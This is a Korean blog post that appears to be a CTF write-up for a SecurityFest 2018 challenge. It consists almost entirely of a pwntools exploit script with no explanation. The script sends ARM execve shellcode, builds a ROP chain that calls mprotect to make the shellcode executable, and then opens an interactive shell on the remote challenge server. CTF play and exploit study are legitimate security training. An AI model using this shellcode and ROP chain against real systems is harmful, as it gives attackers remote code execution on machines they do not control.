반응형
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 | from pwn import * #r = remote("0.0.0.0", 5555) r = remote("pwn2.trinity.neo.ctf.rocks",31337) #context.log_level = 'debug' def login(r,shellcode): r.sendlineafter("Login: ", shellcode) def store(r,index, data): r.sendlineafter("Select storage slot: ", str(index)) r.sendlineafter("Data for storage: ", data) r.sendlineafter("Store more? (y/n): ", "y") shellcode = 'hp\x00\xe3AqD\xe3\x04p-\xe5/\x7f\x02\xe3/sG\xe3\x04p-\xe5/r\x06\xe3i~F\xe3\x04p-\xe5\r\x00\xa0\xe1sx\x06\xe3\x04p-\xe5\x0c\xc0,\xe0\x04\xc0-\xe5\x04\x10\xa0\xe3\r\x10\x81\xe0\x01\xc0\xa0\xe1\x04\xc0-\xe5\r\x10\xa0\xe1\x02 "\xe0\x0bp\xa0\xe3\x00\x00\x00\xef' shellcode_addr = '4AGgG3' #0x00034cad : pop {r1, r2, r3, r4, r5, r6, pc} WhqByt #0x0006ef8c : pop {r0, pc} Swqbl4 #0x00061dfd : pop {r0, r1, r2, r7, pc} #00547D0 call mprot #0x00010450 : pop {r4, pc} HsB1T0 popr0 = "Swqbl4" popr1r2r6 = "WhqByt" #pop = "YMQVYd" mprotect_r0 = "3eMZYA" mprotect_r1 = "Ml2N17" mprotect_r2 = "JHKoU3" call_mprot = "dyqkXm" raw_input(">>") login(r,shellcode) r.sendlineafter("@RRF-CONTROL> ","1") store(r,14, popr0) store(r,15, mprotect_r0) store(r,16, popr1r2r6) store(r,17, mprotect_r1) store(r,18, mprotect_r2) store(r,19, "AAAA")#3 store(r, 20, shellcode_addr)#4 store(r,21, "AAAA")#5 store(r,22, "AAAA")#6 store(r,23, call_mprot) store(r, 24, "AAAA") store(r, 25,shellcode_addr) raw_input(">>") r.interactive() #shellcraft.sh() #asm(shellcraft.sh()) #context.arch = 'amd64' #mprotect(address, size, prot) # 0x99000 0x1000 0x7 #pc = login #mprotect dmf lrfh flxjsgka #pc = call mprotect | cs |
asdasd
반응형
'Write-up' 카테고리의 다른 글
[InCTF 2018] writeup (0) | 2018.10.16 |
---|---|
[CSAW 2018] writeup (0) | 2018.09.21 |
[SECURITYFEST 2018] zion writeup (0) | 2018.06.03 |
[SECURITYFEST 2018] Mr.reagan (0) | 2018.06.03 |
[SECURITYFEST 2018] everywhere writeup (0) | 2018.06.03 |